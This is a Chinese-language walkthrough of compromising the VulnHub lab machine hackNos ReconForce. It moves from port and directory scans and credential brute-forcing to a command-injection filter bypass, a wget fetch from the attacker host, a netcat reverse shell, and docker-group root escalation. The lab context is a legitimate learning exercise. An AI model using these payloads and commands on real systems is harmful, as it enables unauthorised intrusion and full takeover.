靶机地址
https://www.vulnhub.com/entry/hacknos-reconforce,416/
靶机测试
信息收集
nmap扫描端口
nmap扫描结果
└─$ nmap -sC -sV 192.168.1.100 -oA hack 139 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-13 09:35 CST
Nmap scan report for 192.168.1.100
Host is up (0.00054s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.53
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6f:96:94:65:72:80:08:93:23:90:20:bc:76:df:b8:ec (RSA)
| 256 6f:bb:49:1a:a9:b6:e5:00:84:19:a0:e4:2b:c4:57:c4 (ECDSA)
|_ 256 ce:3d:94:05:f4:a6:82:c4:7f:3f:ba:37:1d:f6:23:b0 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Recon_Web
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.12 seconds
zsh: segmentation fault nmap -sC -sV 192.168.1.100 -oA hack开放21,22,80端口ftp允许匿名用户,
目录扫描
─$ gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 100
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.100
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2023/01/13 09:44:24 Starting gobuster in directory enumeration mode
===============================================================
/css (Status: 301) [Size: 312] [--> http://192.168.1.100/css/]
/server-status (Status: 403) [Size: 278]
Progress: 296340 / 441122 (67.18%) ^C
[!] Keyboard interrupt detected, terminating.访问主页
点击这里弹出登录框
ftp 匿名登录
ftp 允许匿名登录 但是目录没有任何内容 但是有登录提示 Secure@hackNos
python 组合密码
word = ['Recon','Security','5ecure','Secure']
for i in word:
print(i+'@hackNos')
破解基础认证
msfconsole
use auxiliary/scanner/http/http_login
admin:Security@hackNos
命令执行漏洞
分析源码
127.0.0.1||ls
127.0.0.1||cat out.php
<pre><?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = trim($_REQUEST[ 'ip' ]);
// Set blacklist
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
echo "<pre>{$cmd}</pre>";
}
?>
</pre> 过滤众多字符,上面的组合刚好绕过
反弹shell
下载文件
||wget http://192.168.1.53/1.php
nc -lvnp 90python -c 'import pty;pty.spawn("/bin/bash")'获得交互shell
测试用户 recon 密码
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
recon:x:1000:119:rahul:/home/recon:/bin/bash获得user.txt
hydra 测试密码
└─$ hydra -l recon -P pass ssh://192.168.1.100 
ssh登录 recon 用户
└─$ ssh recon@192.168.1.100sudo -lrecon用户有所有权限
查看root.txt
特权提升
方法一
ls -la查看有sudo_as_admin_successful
sudo -l 输入密码 Security@hackNos
看到可以执行任何命令
方法二
id
groups
存在 docker 组 可以用 docker 提权
docker images
创建容器 shell
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
自动下载 alpine 文件
创建宿主根目录到 mbt 目录
docker run -it -v /:/mbt e7d92cdc71fe
cd /mbt
cat root/root.txt
学习总结
nmap 扫描
gobuster 目录扫描
基础认证破解
密码组合
执行漏洞
创建交互式 shell
hydra ssh 破解
分析源码
dacker 提权
智慧需要沉淀,积累才能够饱满
